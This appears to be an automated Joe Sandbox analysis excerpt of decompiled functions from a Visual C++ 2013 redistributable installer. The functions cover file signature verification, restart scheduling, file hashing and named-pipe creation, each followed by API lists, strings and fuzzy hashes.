							_push(0);
							_push(_t124);
							_v36 = _t124;
							_t125 =  &_v28;
							_push(_t125);
							_push(_v44);
							L012AF042();
							__eflags = _t125;
							if(_t125 != 0) {
								L21:
								_v48 = _v28 + _v28 + 1;
								_t91 = E012B00D8( &_v32, _v28 + _v28 + 1);
								__eflags = _t91;
								if(_t91 >= 0) {
									_t92 = E012B01F1(_v36, _v28, _v32, _v48);
									__eflags = _t92;
									if(_t92 >= 0) {
										_v76 =  &_v136;
										_v112 = _v36;
										_v108 = _v28;
										_v116 = _v44;
										_v124 = _v32;
										_v120 = _v40;
										_v100 = 0x30;
										_v88 = _t138;
										_v80 = _t138;
										_v72 = 1;
										_v60 = 0x80;
										_v136 = 0x24;
										_v128 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 8));
										_t145 = WinVerifyTrust(0xffffffff,  &_v24,  &_v100);
										__eflags = _t145;
										if(_t145 == 0) {
											L32:
											_v72 = _t138;
											_t107 = WinVerifyTrust(0xffffffff,  &_v24,  &_v100);
											__eflags = _t107;
											if(__eflags != 0) {
												if(__eflags > 0) {
													_t107 = _t107 & 0x0000ffff | 0x80070000;
													__eflags = _t107;
												}
												_t145 = _t107;
												__eflags = _t145;
												if(_t145 >= 0) {
													_t145 = 0x80004005;
												}
												E012B294E(_t107, "cache.cpp", 0x6ce, _t145);
												_push("Could not close verify handle.");
												goto L38;
											}
										} else {
											_v60 = _v60 | 0x00001000;
											_t118 = WinVerifyTrust(0xffffffff,  &_v24,  &_v100);
											__eflags = _t118;
											if(__eflags == 0) {
												goto L32;
											} else {
												if(__eflags > 0) {
													_t118 = _t118 & 0x0000ffff | 0x80070000;
													__eflags = _t118;
												}
												_t145 = _t118;
												__eflags = _t145;
												if(_t145 >= 0) {
													_t145 = 0x80004005;
												}
												E012B294E(_t118, "cache.cpp", 0x6c8, _t145);
												E012AFA86(_t145, "Could not verify file %ls.", _v52);
											}
										}
									} else {
										_push("Failed to encode file hash.");
										goto L38;
									}
								} else {
									_push("Failed to allocate string.");
									goto L38;
								}
							} else {
								_t87 = GetLastError();
								__eflags = _t87;
								if(_t87 > 0) {
									_t87 = _t87 & 0x0000ffff | 0x80070000;
									__eflags = _t87;
								}
								_t145 = _t87;
								__eflags = _t145;
								if(_t145 >= 0) {
									_t145 = 0x80004005;
								}
								_push(_t145);
								_push(0x69e);
								L14:
								_push("cache.cpp");
								E012B294E(_t87);
								_push("Failed to get file hash.");
								goto L38;
							}
						}
					} else {
						_push("Failed to move file pointer to beginning of file.");
						goto L38;
					}
				} else {
					_push("Failed to allocate memory");
					L38:
					_push(_t145);
					E012AFA86();
				}
				if(_v40 != 0) {
					E012B01E8(_v40);
				}
				if(_v32 != 0) {
					E012B01E8(_v32);
				}
				if(_v36 != 0) {
					E012B24F6(_v36);
				}
				return E012A7EAA(_t145, 0, _v8 ^ _t146, _t136, _t138, _t145);
			}

0x01297e2a
0x01297e33
0x01297e3a
0x01297e45
0x01297e4d
0x01297e51
0x01297e54
0x01297e5e
0x01297e61
0x01297e67
0x01297e67
0x01297e6f
0x01297e78
0x01297e7f
0x01297e86
0x01297e8d
0x01297e93
0x01297e96
0x01297e99
0x01297e9c
0x01297ea8
0x01297eb4
0x01297eb9
0x01297ec2
0x01297ec4
0x01297ec7
0x00000000
0x00000000
0x01297ebc
0x01297ec0
0x01297ec0
0x01297ec0
0x01297ed0
0x01297ed7
0x01297ed9
0x01297ee5
0x01297ee6
0x01297eea
0x01297eeb
0x01297eee
0x01297ef9
0x01297efb
0x01297efe
0x01297f54
0x01297f56
0x00000000
0x01297f58
0x01297f58
0x01297f5f
0x01297f5f
0x01297f5f
0x01297f64
0x01297f66
0x01297f68
0x01297f6a
0x01297f6a
0x01297f6f
0x01297f70
0x00000000
0x01297f70
0x01297f00
0x01297f05
0x01297f0a
0x01297f0b
0x01297f0c
0x01297f0f
0x01297f12
0x01297f13
0x01297f16
0x01297f1b
0x01297f1d
0x01297f77
0x01297f7f
0x01297f86
0x01297f8d
0x01297f8f
0x01297fa7
0x01297fae
0x01297fb0
0x01297fc2
0x01297fc8
0x01297fce
0x01297fd4
0x01297fda
0x01297fe0
0x01297fe9
0x01297ff0
0x01297ff3
0x01297ff6
0x01297ffd
0x01298004
0x01298011
0x01298023
0x01298025
0x01298027
0x0129807d
0x01298087
0x0129808a
0x0129808f
0x01298091
0x01298093
0x0129809a
0x0129809a
0x0129809a
0x0129809f
0x012980a1
0x012980a3
0x012980a5
0x012980a5
0x012980b5
0x012980ba
0x00000000
0x012980ba
0x01298029
0x01298029
0x0129803a
0x0129803f
0x01298041
0x00000000
0x01298043
0x01298043
0x0129804a
0x0129804a
0x0129804a
0x0129804f
0x01298051
0x01298053
0x01298055
0x01298055
0x01298065
0x01298073
0x01298078
0x01298041
0x01297fb2
0x01297fb2
0x00000000
0x01297fb2
0x01297f91
0x01297f91
0x00000000
0x01297f91
0x01297f1f
0x01297f1f
0x01297f21
0x01297f23
0x01297f2a
0x01297f2a
0x01297f2a
0x01297f2f
0x01297f31
0x01297f33
0x01297f35
0x01297f35
0x01297f3a
0x01297f3b
0x01297f40
0x01297f40
0x01297f45
0x01297f4a
0x00000000
0x01297f4a
0x01297f1d
0x01297edb
0x01297edb
0x00000000
0x01297edb
0x01297eaa
0x01297eaa
0x012980bf
0x012980bf
0x012980c0
0x012980c6
0x012980ca
0x012980cf
0x012980cf
0x012980d7
0x012980dc
0x012980dc
0x012980e4
0x012980e9
0x012980e9
0x012980fe

APIs

_memset.LIBCMT ref: 01297E54

Strings

Failed to move file pointer to beginning of file., xrefs: 01297EDB
Could not close verify handle., xrefs: 012980BA
Failed to allocate memory, xrefs: 01297EAA
Failed to get file hash., xrefs: 01297F4A
Failed to allocate string., xrefs: 01297F91
cache.cpp, xrefs: 01297F40, 01298060, 012980B0
$, xrefs: 01298004
0, xrefs: 01297FE9
Could not verify file %ls., xrefs: 0129806D
Failed to encode file hash., xrefs: 01297FB2

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: _memset
String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$Failed to move file pointer to beginning of file.$cache.cpp
API String ID: 2102423945-1888235766
Opcode ID: 07d6da3faefad1c85a1114cc4d2851c94fc7b0e00b96814e80b42c0c9033c712
Instruction ID: eab14cb30244cb9bc1015a27f8eaa0ba8f816baf5032fd5e398068bd8d88891d
Opcode Fuzzy Hash: 07d6da3faefad1c85a1114cc4d2851c94fc7b0e00b96814e80b42c0c9033c712
Instruction Fuzzy Hash: 15816E72D2021EAFDF21EF98CD81AFEBBF8AB08350F14416AE614F7250E6754D458B91

Uniqueness

Uniqueness Score: -1.00%

Function 012813BA Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 142
sleepshutdownCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E012813BA(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				int _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				signed int _t34;
				signed int _t36;
				signed int _t39;
				signed int _t42;
				void* _t50;
				long _t51;
				signed int _t53;
				signed int _t54;

				_t50 = __edx;
				_t17 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t17 ^ _t54;
				_t51 =  &_v24;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v28 = 0;
				_v32 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v28) != 0) {
					_t51 = 1;
					_v24.PrivilegeCount = 1;
					_v12 = 2;
					if(LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v24.Privileges)) != 0) {
						if(AdjustTokenPrivileges(_v28, 0,  &_v24, 0x10, 0, 0) != 0) {
							do {
								_t53 = 0;
								Sleep(0x3e8);
								_push(0x80040002);
								_push(_t51);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								if( *0x12d4f6c() == 0) {
									_t34 = GetLastError();
									if(_t34 > 0) {
										_t34 = _t34 & 0x0000ffff | 0x80070000;
									}
									_t53 = _t34;
								}
								_t28 = _v32;
								_v32 = _v32 + 1;
							} while (_v32 < 0xa && (_t53 == 0x800704f7 || _t53 == 0x80070015));
							if(_t53 < 0) {
								E012B294E(_t28, "engine.cpp", 0x2eb, _t53);
								_push("Failed to schedule restart.");
								goto L27;
							}
						} else {
							_t36 = GetLastError();
							if(_t36 > 0) {
								_t36 = _t36 & 0x0000ffff | 0x80070000;
							}
							_t53 = _t36;
							if(_t53 >= 0) {
								_t53 = 0x80004005;
							}
							E012B294E(_t36, "engine.cpp", 0x2d7, _t53);
							_push("Failed to adjust token to add shutdown privileges.");
							goto L27;
						}
					} else {
						_t39 = GetLastError();
						if(_t39 > 0) {
							_t39 = _t39 & 0x0000ffff | 0x80070000;
						}
						_t53 = _t39;
						if(_t53 >= 0) {
							_t53 = 0x80004005;
						}
						E012B294E(_t39, "engine.cpp", 0x2d2, _t53);
						_push("Failed to get shutdown privilege LUID.");
						goto L27;
					}
				} else {
					_t42 = GetLastError();
					if(_t42 > 0) {
						_t42 = _t42 & 0x0000ffff | 0x80070000;
					}
					_t53 = _t42;
					if(_t53 >= 0) {
						_t53 = 0x80004005;
					}
					E012B294E(_t42, "engine.cpp", 0x2cb, _t53);
					_push("Failed to get process token.");
					L27:
					_push(_t53);
					E012AFA86();
				}
				if(_v28 != 0) {
					CloseHandle(_v28);
				}
				return E012A7EAA(_t53, 0, _v8 ^ _t54, _t50, _t51, _t53);
			}

0x012813ba
0x012813c0
0x012813c7
0x012813cf
0x012813d2
0x012813d3
0x012813d4
0x012813d5
0x012813de
0x012813e1
0x012813f3
0x01281439
0x0128143b
0x0128143e
0x0128144d
0x0128149c
0x012814d4
0x012814d9
0x012814db
0x012814e1
0x012814e6
0x012814e7
0x012814e8
0x012814e9
0x012814ea
0x012814f3
0x012814f5
0x012814fd
0x01281504
0x01281504
0x01281509
0x01281509
0x0128150b
0x0128150e
0x01281511
0x01281528
0x01281535
0x0128153a
0x00000000
0x0128153a
0x0128149e
0x0128149e
0x012814a6
0x012814ad
0x012814ad
0x012814b2
0x012814b6
0x012814b8
0x012814b8
0x012814c8
0x012814cd
0x00000000
0x012814cd
0x0128144f
0x0128144f
0x01281457
0x0128145e
0x0128145e
0x01281463
0x01281467
0x01281469
0x01281469
0x01281479
0x0128147e
0x00000000
0x0128147e
0x012813f5
0x012813f5
0x012813fd
0x01281404
0x01281404
0x01281409
0x0128140d
0x0128140f
0x0128140f
0x0128141f
0x01281424
0x0128153f
0x0128153f
0x01281540
0x01281546
0x0128154a
0x0128154f
0x0128154f
0x01281565

APIs

GetCurrentProcess.KERNEL32(00000020,01281F6E,00000000,?,00000000,?,01281F6E,?,?,?,?,?), ref: 012813E4
OpenProcessToken.ADVAPI32(00000000,?,01281F6E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012813EB
GetLastError.KERNEL32(?,01281F6E,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 012813F5
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 01281445
GetLastError.KERNEL32(?,01281F6E,?,?,?), ref: 0128144F
AdjustTokenPrivileges.ADVAPI32(01281F6E,00000000,?,00000010,00000000,00000000,?,01281F6E,?,?,?), ref: 01281494
GetLastError.KERNEL32(?,01281F6E,?,?,?), ref: 0128149E
Sleep.KERNEL32(000003E8,?,01281F6E,?,?,?), ref: 012814DB
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 012814EB
GetLastError.KERNEL32(?,01281F6E,?,?,?), ref: 012814F5
CloseHandle.KERNEL32(01281F6E), ref: 0128154F

Strings

SeShutdownPrivilege, xrefs: 01281434
Failed to adjust token to add shutdown privileges., xrefs: 012814CD
Failed to get process token., xrefs: 01281424
engine.cpp, xrefs: 0128141A, 01281474, 012814C3, 01281530
<s, xrefs: 012814EB
Failed to schedule restart., xrefs: 0128153A
Failed to get shutdown privilege LUID., xrefs: 0128147E

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp$<s
API String ID: 2241679041-3807145810
Opcode ID: 188196a0396dc0824d2b5585d35d182ea6c2f0ca0af7cfe3e2bc6d9c952e99e7
Instruction ID: a8b62d4a2c294144b257aaaf31bcb39d767effb247e65a2e75c5e748aeff703f
Opcode Fuzzy Hash: 188196a0396dc0824d2b5585d35d182ea6c2f0ca0af7cfe3e2bc6d9c952e99e7
Instruction Fuzzy Hash: 1841D872961217AEDB306AA9ACCDABF7AA8EB10750F180139F601F70C0D67D8D1147A1

Uniqueness

Uniqueness Score: -1.00%

Function 012B7378 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 184
encryptionfileCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E012B7378(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, long _a24) {
				signed int _v8;
				void _v4104;
				char _v4108;
				long _v4112;
				int _v4116;
				void* _v4120;
				long _v4124;
				intOrPtr _v4128;
				union _LARGE_INTEGER* _v4132;
				union _LARGE_INTEGER _v4136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				long** _t48;
				char* _t49;
				char* _t54;
				signed int _t59;
				void* _t63;
				signed int _t68;
				void* _t71;
				void* _t73;
				signed int _t76;

				_t71 = __edx;
				E012AE8C0(0x1024);
				_t40 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t40 ^ _t76;
				_v4120 = _a4;
				_v4128 = _a16;
				_t68 = 0;
				_v4124 = _a24;
				_v4116 = 0;
				_v4108 = 0;
				_v4112 = 0;
				E012A7E30( &_v4104, 0, 0x1000);
				asm("stosd");
				asm("stosd");
				_t73 = 0;
				_t48 =  &_v4116;
				__imp__CryptAcquireContextW(_t48, 0, 0, _a8, 0xf0000040);
				if(_t48 != 0) {
					_t49 =  &_v4108;
					__imp__CryptCreateHash(_v4116, _a12, 0, 0, _t49);
					if(_t49 != 0) {
						_push(0);
						_t73 = ReadFile;
						while(ReadFile(_v4120,  &_v4104, 0x1000,  &_v4112, ??) != 0) {
							_push(0);
							if(_v4112 == 0) {
								_t54 =  &_a20;
								__imp__CryptGetHashParam(_v4108, 2, _v4128, _t54);
								if(_t54 != 0) {
									if(_v4124 != _t68) {
										_push(1);
										if(SetFilePointerEx(_v4120, _v4136, _v4132, _v4124) == 0) {
											_t59 = GetLastError();
											if(_t59 > 0) {
												_t59 = _t59 & 0x0000ffff | 0x80070000;
											}
											_t68 = _t59;
											if(_t68 >= 0) {
												_t68 = 0x80004005;
											}
											_push(_t68);
											_push(0xb8);
											goto L40;
										}
									}
								} else {
									_t59 = GetLastError();
									if(_t59 > 0) {
										_t59 = _t59 & 0x0000ffff | 0x80070000;
									}
									_t68 = _t59;
									if(_t68 >= 0) {
										_t68 = 0x80004005;
									}
									_push(_t68);
									_push(0xb1);
									goto L40;
								}
							} else {
								_t63 =  &_v4104;
								__imp__CryptHashData(_v4108, _t63, _v4112);
								if(_t63 == 0) {
									_t59 = GetLastError();
									if(_t59 > 0) {
										_t59 = _t59 & 0x0000ffff | 0x80070000;
									}
									_t68 = _t59;
									if(_t68 >= 0) {
										_t68 = 0x80004005;
									}
									_push(_t68);
									_push(0xaa);
									goto L40;
								} else {
									_push(0);
									continue;
								}
							}
							goto L41;
						}
						_t59 = GetLastError();
						if(_t59 > 0) {
							_t59 = _t59 & 0x0000ffff | 0x80070000;
						}
						_t68 = _t59;
						if(_t68 >= 0) {
							_t68 = 0x80004005;
						}
						_push(_t68);
						_push(0x9f);
					} else {
						_t59 = GetLastError();
						if(_t59 > 0) {
							_t59 = _t59 & 0x0000ffff | 0x80070000;
						}
						_t68 = _t59;
						if(_t68 >= _t73) {
							_t68 = 0x80004005;
						}
						_push(_t68);
						_push(0x97);
					}
					goto L40;
				} else {
					_t59 = GetLastError();
					if(_t59 > 0) {
						_t59 = _t59 & 0x0000ffff | 0x80070000;
					}
					_t68 = _t59;
					if(_t68 >= _t73) {
						_t68 = 0x80004005;
					}
					_push(_t68);
					_push(0x91);
					L40:
					_push("cryputil.cpp");
					E012B294E(_t59);
				}
				L41:
				if(_v4108 != 0) {
					__imp__CryptDestroyHash(_v4108);
				}
				if(_v4116 != 0) {
					CryptReleaseContext(_v4116, 0);
				}
				return E012A7EAA(_t68, _t68, _v8 ^ _t76, _t71, _t73, 0);
			}

0x012b7378
0x012b7380
0x012b7385
0x012b738c
0x012b7394
0x012b739e
0x012b73a7
0x012b73af
0x012b73bd
0x012b73c3
0x012b73c9
0x012b73cf
0x012b73df
0x012b73e8
0x012b73e9
0x012b73ed
0x012b73f4
0x012b73fc
0x012b7428
0x012b743a
0x012b7442
0x012b746e
0x012b746f
0x012b74a5
0x012b7479
0x012b7480
0x012b74ea
0x012b74fc
0x012b7504
0x012b7533
0x012b7535
0x012b7557
0x012b7559
0x012b7561
0x012b7568
0x012b7568
0x012b756d
0x012b7571
0x012b7573
0x012b7573
0x012b7578
0x012b7579
0x00000000
0x012b7579
0x012b7557
0x012b7506
0x012b7506
0x012b750e
0x012b7515
0x012b7515
0x012b751a
0x012b751e
0x012b7520
0x012b7520
0x012b7525
0x012b7526
0x00000000
0x012b7526
0x012b7482
0x012b7488
0x012b7495
0x012b749d
0x012b7580
0x012b7588
0x012b758f
0x012b758f
0x012b7594
0x012b7598
0x012b759a
0x012b759a
0x012b759f
0x012b75a0
0x00000000
0x012b74a3
0x012b74a3
0x00000000
0x012b74a3
0x012b749d
0x00000000
0x012b7480
0x012b74c0
0x012b74c8
0x012b74cf
0x012b74cf
0x012b74d4
0x012b74d8
0x012b74da
0x012b74da
0x012b74df
0x012b74e0
0x012b7444
0x012b7444
0x012b744c
0x012b7453
0x012b7453
0x012b7458
0x012b745c
0x012b745e
0x012b745e
0x012b7463
0x012b7464
0x012b7464
0x00000000
0x012b73fe
0x012b73fe
0x012b7406
0x012b740d
0x012b740d
0x012b7412
0x012b7416
0x012b7418
0x012b7418
0x012b741d
0x012b741e
0x012b75a5
0x012b75a5
0x012b75aa
0x012b75aa
0x012b75af
0x012b75b7
0x012b75bf
0x012b75bf
0x012b75cb
0x012b75d4
0x012b75d4
0x012b75ea

APIs

_memset.LIBCMT ref: 012B73CF
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000000,F0000040,00000000,?,00000000,00000000,?,?,012995E8,00000000,?,?,00000000), ref: 012B73F4
GetLastError.KERNEL32(?,?,012995E8,00000000,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 012B73FE
CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?,?,?,012995E8,00000000,?,?,00000000,?,?,00000000,00000000), ref: 012B743A
GetLastError.KERNEL32(?,?,012995E8,00000000,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 012B7444
CryptHashData.ADVAPI32(?,?,?,00000000,?,?,012995E8,00000000,?,?,00000000,?,?,00000000,00000000,?), ref: 012B7495
ReadFile.KERNEL32(?,?,00001000,?,00000000,?,?,012995E8,00000000,?,?,00000000,?,?,00000000,00000000), ref: 012B74BA
GetLastError.KERNEL32(?,?,012995E8,00000000,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 012B74C0
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,?,012995E8,00000000,?,?,00000000,?,?,00000000,00000000), ref: 012B74FC
GetLastError.KERNEL32(?,?,012995E8,00000000,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 012B7506
SetFilePointerEx.KERNEL32(?,?,?,?,00000001,?,?,012995E8,00000000,?,?,00000000,?,?,00000000,00000000), ref: 012B754F
GetLastError.KERNEL32(?,?,012995E8,00000000,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 012B7559
GetLastError.KERNEL32(?,?,012995E8,00000000,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 012B7580
CryptDestroyHash.ADVAPI32(?,?,?,012995E8,00000000,?,?,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 012B75BF
CryptReleaseContext.ADVAPI32(?,00000000,?,?,012995E8,00000000,?,?,00000000,?,?,00000000,00000000,?,?,00000000), ref: 012B75D4

Strings

cryputil.cpp, xrefs: 012B75A5

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease_memset
String ID: cryputil.cpp
API String ID: 961722652-2185294990
Opcode ID: 1a34b054c6d17e13957e37dcb32b6101a7abf6b8e1629104c764fa5a93e5e026
Instruction ID: a45000367109404afd8c1eab7b83cbe8c1ee906e75fbfe2206b6f4ccb89118a5
Opcode Fuzzy Hash: 1a34b054c6d17e13957e37dcb32b6101a7abf6b8e1629104c764fa5a93e5e026
Instruction Fuzzy Hash: 6251AC71A20256ABEB314E54DCC8BEA7BB8EF48781F0044B5A744E6190D7B9CDC49F50

Uniqueness

Uniqueness Score: -1.00%

Function 012835A5 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 174
pipeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E012835A5(void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int* _a12) {
				signed int _v8;
				WCHAR* _v12;
				signed int _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				void* _v36;
				signed int _t53;
				void* _t57;
				void* _t58;
				signed int _t66;
				signed int _t67;
				signed int _t72;
				void** _t77;
				signed int _t79;
				long _t84;
				intOrPtr _t88;
				void* _t96;

				_t96 = __esi;
				_v24 = _v24 | 0xffffffff;
				asm("stosd");
				_t84 = 0;
				asm("stosd");
				_v16 = 0;
				asm("stosd");
				_v12 = 0;
				if(_a8 != 0) {
					L8:
					_push(_t96);
					_t97 = _a4;
					_t53 = E012B177A( &_v12, L"\\\\.\\pipe\\%ls",  *_a4);
					_v8 = _t53;
					if(_t53 >= _t84) {
						asm("sbb eax, eax");
						_t57 = CreateNamedPipeW(_v12, 0x80003, _t84, 1, 0x10000, 0x10000, 1,  ~_v16 &  &_v36);
						_v20 = _t57;
						if(_t57 != 0xffffffff) {
							if(_a8 == 0) {
								_t58 = _v24;
								L34:
								_t88 = _a4;
								 *(_t88 + 0x14) = _t58;
								 *((intOrPtr*)(_t88 + 0x10)) = _v20;
								 *_a12 =  *_a12 & 0x00000000;
								L20:
								_t84 = 0;
								L21:
								L22:
								if(_v12 != _t84) {
									E012B01E8(_v12);
								}
								if(_v16 != _t84) {
									LocalFree(_v16);
								}
								return _v8;
							}
							_t66 = E012B177A( &_v12, L"\\\\.\\pipe\\%ls.Cache",  *_a4);
							_v8 = _t66;
							if(_t66 >= 0) {
								_t58 = CreateNamedPipeW(_v12, 0x80003, 0, 1, 0x10000, 0x10000, 1, 0);
								if(_t58 != 0xffffffff) {
									goto L34;
								}
								_t67 = GetLastError();
								if(_t67 > 0) {
									_t67 = _t67 & 0x0000ffff | 0x80070000;
								}
								_v8 = _t67;
								if(_t67 >= 0) {
									_v8 = 0x80004005;
								}
								E012B294E(_t67, "pipe.cpp", 0x14e, _v8);
								_push(_v12);
								_push("Failed to create pipe: %ls");
								_push(_v8);
								L19:
								E012AFA86();
								CloseHandle(_v20);
								goto L20;
							}
							_push( *_a4);
							_push("Failed to allocate full name of cache pipe: %ls");
							_push(_t66);
							goto L19;
						}
						_t72 = GetLastError();
						if(_t72 > 0) {
							_t72 = _t72 & 0x0000ffff | 0x80070000;
						}
						_v8 = _t72;
						if(_t72 >= 0) {
							_v8 = 0x80004005;
						}
						E012B294E(_t72, "pipe.cpp", 0x142, _v8);
						E012AFA86(_v8, "Failed to create pipe: %ls", _v12);
						goto L20;
					}
					E012AFA86(_t53, "Failed to allocate full name of pipe: %ls",  *_t97);
					goto L21;
				}
				_push(0);
				_t77 =  &_v16;
				_push(_t77);
				_push(1);
				_push(L"D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)");
				L012A7C82();
				if(_t77 != 0) {
					_v36 = 0xc;
					_v32 = _v16;
					_v28 = 0;
					goto L8;
				}
				_t79 = GetLastError();
				if(_t79 > 0) {
					_t79 = _t79 & 0x0000ffff | 0x80070000;
				}
				_v8 = _t79;
				if(_t79 >= _t84) {
					_v8 = 0x80004005;
				}
				E012B294E(_t79, "pipe.cpp", 0x132, _v8);
				_push("Failed to create the security descriptor for the connection event and pipe.");
				_push(_v8);
				E012AFA86();
				goto L22;
			}

0x012835a5
0x012835ab
0x012835b6
0x012835b7
0x012835b9
0x012835ba
0x012835bd
0x012835be
0x012835c4
0x01283633
0x01283633
0x01283634
0x01283642
0x0128364a
0x0128364f
0x01283671
0x0128368e
0x01283690
0x01283696
0x012836e5
0x012837a4
0x012837a7
0x012837a7
0x012837aa
0x012837b0
0x012837b6
0x01283724
0x01283724
0x01283726
0x01283727
0x0128372a
0x0128372f
0x0128372f
0x01283739
0x0128373e
0x0128373e
0x01283748
0x01283748
0x012836f9
0x01283701
0x01283706
0x01283759
0x0128375e
0x00000000
0x00000000
0x01283760
0x01283768
0x0128376f
0x0128376f
0x01283774
0x01283779
0x0128377b
0x0128377b
0x0128378f
0x01283794
0x01283797
0x0128379c
0x01283713
0x01283713
0x0128371e
0x00000000
0x0128371e
0x0128370b
0x0128370d
0x01283712
0x00000000
0x01283712
0x01283698
0x012836a0
0x012836a7
0x012836a7
0x012836ac
0x012836b1
0x012836b3
0x012836b3
0x012836c7
0x012836d7
0x00000000
0x012836dc
0x01283659
0x00000000
0x0128365e
0x012835c6
0x012835c7
0x012835ca
0x012835cb
0x012835cd
0x012835d2
0x012835d9
0x01283626
0x0128362d
0x01283630
0x00000000
0x01283630
0x012835db
0x012835e3
0x012835ea
0x012835ea
0x012835ef
0x012835f4
0x012835f6
0x012835f6
0x0128360a
0x0128360f
0x01283614
0x01283617
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 012835D2
GetLastError.KERNEL32(00000000,012817A1,0128BD3C,0128130D,?), ref: 012835DB
CreateNamedPipeW.KERNEL32(0128130D,00080003,00000000,00000001,00010000,00010000,00000001,?,0128130D,00000000,012817A1,0128BD3C,0128130D,?), ref: 0128368E
GetLastError.KERNEL32 ref: 01283698
CloseHandle.KERNEL32(?,pipe.cpp,0000014E,000000FF), ref: 0128371E
LocalFree.KERNEL32(?,0128130D), ref: 0128373E
CreateNamedPipeW.KERNEL32(0128130D,00080003,00000000,00000001,00010000,00010000,00000001,00000000), ref: 01283759
GetLastError.KERNEL32 ref: 01283760

Strings

\\.\pipe\%ls.Cache, xrefs: 012836F3
Failed to create the security descriptor for the connection event and pipe., xrefs: 0128360F
D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 012835CD
pipe.cpp, xrefs: 01283605, 012836C2, 0128378A
Failed to allocate full name of pipe: %ls, xrefs: 01283653
\\.\pipe\%ls, xrefs: 0128363C
Failed to create pipe: %ls, xrefs: 012836CF, 01283797
Failed to allocate full name of cache pipe: %ls, xrefs: 0128370D

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
